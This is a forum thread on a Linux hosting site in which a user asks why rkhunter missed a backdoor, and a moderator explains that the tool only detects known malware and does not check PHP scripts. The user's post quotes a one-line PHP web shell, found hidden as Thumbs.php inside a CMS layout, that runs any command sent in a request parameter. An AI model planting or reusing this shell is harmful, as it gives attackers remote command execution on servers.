Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 3 > Developers' Forum

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 25th February 2012, 15:00
lanceq lanceq is offline
Junior Member
 
Join Date: Dec 2011
Posts: 7
Thanks: 0
Thanked 0 Times in 0 Posts
Default why rkhunter not detected this backdoor

Hello,
Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains:
Code:
<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
It seems to me that this backdoor exactly:

http://www.xakep.ru/magazine/xa/124/038/1.asp

This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

I have ispconfig 3.0.4.3, why rkhunter did not block this backdoor?
I thought these programs with ispconfig will protect me from the backdoor
Reply With Quote
Sponsored Links
  #2  
Old 26th February 2012, 12:06
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lneburg, Germany
Posts: 41,711
Thanks: 1,900
Thanked 2,702 Times in 2,545 Posts
 
Default

First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
fail2ban.filter : INFO Log rotation detected for /var/log/mail.log dynamind Installation/Configuration 1 18th July 2011 09:53
LXC containers as VM's for ISPConfig 3 - First steps & quick start. CSsab Tips/Tricks/Mods 6 7th February 2011 16:14
Autoresponder Not working b00gz Installation/Configuration 10 28th October 2010 21:58
Please review RKHUNTER Log jmh_fl General 1 27th April 2010 16:44
rkhunter Messages atjensen11 Installation/Configuration 0 16th September 2009 17:59


All times are GMT +2. The time now is 09:31.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.